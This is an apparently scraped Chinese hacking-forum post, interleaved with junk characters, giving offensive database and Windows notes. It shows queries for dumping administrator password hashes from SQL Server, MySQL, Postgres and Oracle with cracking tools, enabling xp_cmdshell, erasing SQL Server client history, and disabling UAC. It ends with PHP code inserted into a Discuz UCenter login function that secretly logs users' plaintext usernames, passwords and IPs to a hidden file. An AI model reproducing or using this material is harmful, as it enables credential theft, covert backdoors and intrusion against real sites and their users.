6 { \/ i3 C& V7 A3 e. w7 w; F& d( _" P' n7 A" F# ^% C5 n
各种类型数据库抓HASH破解最高权限密码!; ? d0 g3 r* C& z8 D
1.sql server2000
& G7 Z1 `7 o& i$ bSELECT password from master.dbo.sysxlogins where name='sa'/ ^5 E$ K- Q- ~# G; g3 ~
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
6 g( M# \ m8 \; F D2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
" `& A( @5 F$ i9 G0 F% `
# s, G. C" o9 Y8 `0×0100- constant header& ]' f2 u9 \; q; I7 _
34767D5C- salt
1 E; `$ C% d; u3 {! C7 R0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash4 \7 c7 B7 E& w* t3 _) H0 F/ [9 V
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
3 L ~, r! a2 c# ~3 F& Tcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash; v% _2 C/ [4 P% O! B% Q/ |4 s
SQL server 2005:-
2 K' \! I% x# Q* X) zSELECT password_hash FROM sys.sql_logins where name='sa'1 T& a9 |4 t( v# }
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F& P$ e: A, {' l5 D% f6 t
0×0100- constant header$ W, ^2 T; X$ Y" y3 F' A4 m
993BF231-salt
. x* v0 Z5 J- v1 w5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash5 Y" g9 g' J3 x- W2 T. X6 Q
crack case sensitive hash in cain, try brute force and dictionary based attacks.
- A* w' N; L, x* c: e7 N6 l4 o- [3 G2 |! l
update:- following bernardo’s comments:-
0 \) X. }. H' }( H3 T/ Buse function fn_varbintohexstr() to cast password in a hex string.8 k. O y3 B+ l& \2 x3 ?" |3 s
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins Q0 T2 N6 ]/ x+ G6 A- D
, D" T- t1 j. [; VMYSQL:-- V5 x! L' M( d% L* n' P( f6 N
. U R" k9 }1 b6 {+ zIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
; Y m1 ]( k" N
9 m+ t3 ~/ l8 Y Z. s2 b+ Q5 N*mysql < 4.12 X: `- C; [* \6 |2 y2 u
/ l8 ~% c D' U8 A2 i% O
mysql> SELECT PASSWORD(‘mypass’);
7 B" B" ?. k9 T9 l c+——————–+
" l3 O" }2 ^$ y3 [/ o| PASSWORD(‘mypass’) |
' f( C/ w' ]% W4 ?; | g* X" c& S, E+——————–+" S: K" j; T* |. J9 u" F
| 6f8c114b58f2ce9e |
+ g* Y4 M* M4 U/ f+——————–+# t8 p' L+ Y1 y: k
3 F- X; j% [/ O3 P- Y( B! E8 i
*mysql >=4.1$ M; |2 E ~, l
7 G$ A+ v( k! B$ mmysql> SELECT PASSWORD(‘mypass’);. N$ s; y% d, m3 [, q
+——————————————-+7 u7 D* |# ^4 E
| PASSWORD(‘mypass’) |
! N% W5 |# z( N w+——————————————-+$ M! u, u* y! f" l
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |. m' A' K H( e2 n) b. C H
+——————————————-+ E x! r/ u% s/ W
3 R% ?- r) K8 Y; W8 u8 Q
Select user, password from mysql.user7 r8 ~2 u5 z8 W/ E N
The hashes can be cracked in ‘cain and abel’
9 N" ?. @. w+ h! ^; l8 o3 G: D7 Q( F+ G7 x
Postgres:-+ e! m) L6 B) v
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
) m8 X7 I2 t* J" x: _select usename, passwd from pg_shadow;$ f3 |" a0 g: F5 p3 ]. g
usename | passwd
' I$ Y& ?2 P. Y" c7 I- G' v! D——————+————————————-+ u1 I3 q- ]- o$ Z$ H
testuser | md5fabb6d7172aadfda4753bf0507ed43963 L# U9 ^" r; t6 Z& I
use mdcrack to crack these hashes:-& n; w$ T7 v* j! ` S" I
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396$ x0 x2 { o( @
6 T/ y) U9 J9 G" v3 a& d8 NOracle:-
7 k; T6 H, O3 \; z; _select name, password, spare4 from sys.user$
1 D* O4 d1 i8 o: Ihashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
6 n1 o! ~! U& i+ rMore on Oracle later, i am a bit bored….
, w, [6 w# P, ^; _9 S: e
/ w2 h3 B! E; e* ?8 w" W" j* l% S4 C7 ?; x
在sql server2005/2008中开启xp_cmdshell# P S7 Z: l2 \# { H i2 E
-- To allow advanced options to be changed.1 s! j U) }' w5 C4 h: s
EXEC sp_configure 'show advanced options', 1
" g9 k7 k+ Q5 _" M- O9 zGO
8 V6 d: V+ Q" U-- To update the currently configured value for advanced options.
( A: ^1 z: v+ B5 D$ M; N$ G4 VRECONFIGURE; ~# n5 [0 h+ Q% f) V
GO
+ _6 a5 q- R" v m! r: x# O-- To enable the feature.
, b/ k3 _: b9 a. [8 XEXEC sp_configure 'xp_cmdshell', 1
$ s `( k+ U/ M) ^1 G; EGO/ L9 |9 ?4 k2 q7 ^3 r3 x! s2 t8 s) J
-- To update the currently configured value for this feature.
; \/ Y8 ]* \. U7 B2 YRECONFIGURE9 D* G- @! j0 G6 Q# k7 a7 x
GO* @ w$ c2 A: s& r( M3 c! R* B% d
SQL 2008 server日志清除,在清楚前一定要备份。, [- C. d$ s# M2 L# y& y
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
% l% w3 Z3 N6 M1 p- U" T* `X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin- {2 f. s/ v% _5 x
; Q/ o8 a# S3 G' V& \7 P" F
对于SQL Server 2008以前的版本:. A0 x/ w+ @& o: H: S0 F% N
SQL Server 2005:- b. J! \7 m) l$ ]
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
7 Y' E: k# d$ cSQL Server 2000:; t" ]* d( P0 K; l- I
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。) b$ |! G j1 {- P& k, M- R* C8 r$ y$ ?
5 h) w. f2 ]9 S; [
本帖最后由 simeon 于 2013-1-3 09:51 编辑0 F& `, L, }5 R% U' a, `
8 F6 l% ] F( B: z. R$ f- ]1 E/ f8 N
windows 2008 文件权限修改
% w# ], R! t( w5 B+ J; k3 S1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
- R4 k0 f+ g; C S" P- G3 _2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
/ i i @+ v& {, i/ i1 K一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,$ E. {* d* B0 t. V, d# C7 [
: }, N) O5 i/ Y: n
Windows Registry Editor Version 5.00- ?* L& i+ D N4 z* y
[HKEY_CLASSES_ROOT\*\shell\runas]6 g% F% J# C+ e) y
@="管理员取得所有权"5 l7 X5 @3 d6 W6 Q- {) c" W
"NoWorkingDirectory"=""4 K. K0 S: R- ?5 {/ t! _
[HKEY_CLASSES_ROOT\*\shell\runas\command]
. r5 H# G) W- I6 G@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 n7 s" o8 _& s, k6 c
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& w' x7 x b& f$ P! y6 ]4 v
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
n, ^1 [+ v' d@="管理员取得所有权") |# P( V1 H5 G/ P
"NoWorkingDirectory"=""* u# G. U9 F, {0 D$ e" ?7 i5 Y, a
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]( k8 X$ P9 t% f; E3 L/ a
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 |7 l3 S: z1 M6 H"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"( k4 B4 \. o; z& K' I; Q
1 s5 z4 F4 t1 [. w9 F& w( k5 a8 h[HKEY_CLASSES_ROOT\Directory\shell\runas]
$ t" ?: K" D5 Y( o8 C@="管理员取得所有权", p" G* ]3 B6 Y( U" O
"NoWorkingDirectory"=""7 T" R! K1 y; V& x, |
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
% R( L" s. r4 g4 P; C `! @@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
, O9 k" G( p6 L {0 k( d"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
; }" Y ^# V( Q5 H2 n" s: Q% W! h7 q0 D4 r7 X h3 H: [( Q
2 @8 Z( [" u/ B# z. H/ j4 _8 G
win7右键“管理员取得所有权”.reg导入
7 |% o5 q( t/ Z% K; V: k' H: n' |# J) ?) J二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,8 ~1 I8 w$ p7 w' V$ N8 ?
1、C:\Windows这个路径的“notepad.exe”不需要替换
9 ]+ W, [% P* b# T, I2、C:\Windows\System32这个路径的“notepad.exe”不需要替换7 t- l+ z* R: S+ ?/ W! b6 `
3、四个“notepad.exe.mui”不要管1 @- L0 k# |( a6 ?# @8 L
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
: ?; \8 ] A1 i4 UC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”' B1 S$ D1 k1 b0 h( a4 m
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,& W" G+ o; g( Z' e8 a* N
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。5 ^& o# q; X6 h
windows 2008中关闭安全策略:
5 h2 F3 h9 F7 k6 Y xreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, I6 {: m8 O# U; F0 O
修改uc_client目录下的client.php 在
( p) j0 \/ c! n5 `" Nfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {/ y. O& D+ l6 A! E# U; `
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
% e5 Q* h/ Q2 {0 r* J你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
* c0 y' _3 x# W4 l% {if(getenv('HTTP_CLIENT_IP')) {
; e( h9 V5 n( n" [; r+ O' W" D$onlineip = getenv('HTTP_CLIENT_IP');8 C9 y: j5 K5 Q
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
* [$ E n& `- G" J$onlineip = getenv('HTTP_X_FORWARDED_FOR');- S1 S8 y! O( c/ Y' k/ j+ e) o
} elseif(getenv('REMOTE_ADDR')) {3 L, p9 [+ e2 ^4 w- o
$onlineip = getenv('REMOTE_ADDR');* k8 l1 P6 b% x/ K& E2 u+ g
} else {
. B [) p& F7 V) {% q6 Y2 }$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
5 a9 \% Q }4 p3 h2 G}- w/ U8 w& `3 x3 q2 y
$showtime=date("Y-m-d H:i:s");+ O4 `9 |0 O! _, E) O% e
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";2 f) v6 k% o' b0 @
$handle=fopen('./data/cache/csslog.php','a+');' N( J& w C1 }, A* v
$write=fwrite($handle,$record); |